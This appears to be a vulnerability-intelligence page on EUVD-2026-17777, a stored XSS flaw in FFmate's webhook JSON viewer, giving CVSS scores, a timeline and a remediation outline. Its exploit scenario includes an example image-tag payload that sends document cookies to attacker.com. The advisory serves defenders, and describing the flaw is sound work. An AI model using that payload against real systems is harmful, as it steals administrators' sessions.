Is there a public PoC exploit available for EUVD-2026-17777?

Yes, a public proof-of-concept exploit is available for EUVD-2026-17777. Prioritise patching immediately. EPSS: 0.0%.

Ffmate EUVD-2026-17777

Q: What is the CVSS score of EUVD-2026-17777?

EUVD-2026-17777 has a CVSS 4.0 base score of 2.0 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

| CVE-2026-5254 LOW

Cross-site Scripting (XSS) (CWE-79)

2026-04-01 VulDB

GHSA-hjf3-5wh2-p9qw

XSS Ffmate

2.0

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.0 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Scope

Lifecycle Timeline

Severity Changed

Apr 29, 2026 - 01:11 NVD

MEDIUM LOW

CVSS changed

Apr 29, 2026 - 01:11 NVD

5.1 (MEDIUM) 2.0 (LOW)

PoC Detected

Apr 01, 2026 - 14:23 vuln.today

Public exploit code

EUVD ID Assigned

Apr 01, 2026 - 05:15 euvd

EUVD-2026-17777

Analysis Generated

Apr 01, 2026 - 05:15 vuln.today

CVE Published

Apr 01, 2026 - 04:15 nvd

MEDIUM 5.1

DescriptionCVE.org

A security vulnerability has been detected in welovemedia FFmate up to 2.0.15. Affected by this issue is some unknown functionality of the file /ui/app/components/AppJsonTreeView.vue of the component Webhook Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Stored cross-site scripting (XSS) in welovemedia FFmate up to version 2.0.15 allows authenticated remote attackers to inject malicious scripts via the Webhook Handler component's AppJsonTreeView.vue file. The vulnerability requires user interaction to trigger payload execution and has been publicly disclosed with exploit code available on GitHub. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	This vulnerability presents a moderate real-world risk despite the CVSS 5.1 score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	A threat actor with valid credentials to a FFmate instance crafts a specially designed webhook containing XSS payload (e.g., <img src=x onerror='fetch(attacker.com?cookie='+document.cookie)'>) and triggers it to display in the AppJsonTreeView component. If an authorized administrator clicks on or hovers over the malicious webhook entry in the UI to inspect its JSON structure, the JavaScript executes in their browser context, allowing the attacker to steal session cookies, perform actions on behalf of the admin, or redirect them to a phishing site. …
Remediation	Users of FFmate should immediately upgrade to a version newer than 2.0.15 once available, though vendor patch status is not confirmed given the lack of vendor response. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

EUVD-2026-17777 vulnerability details – vuln.today

Back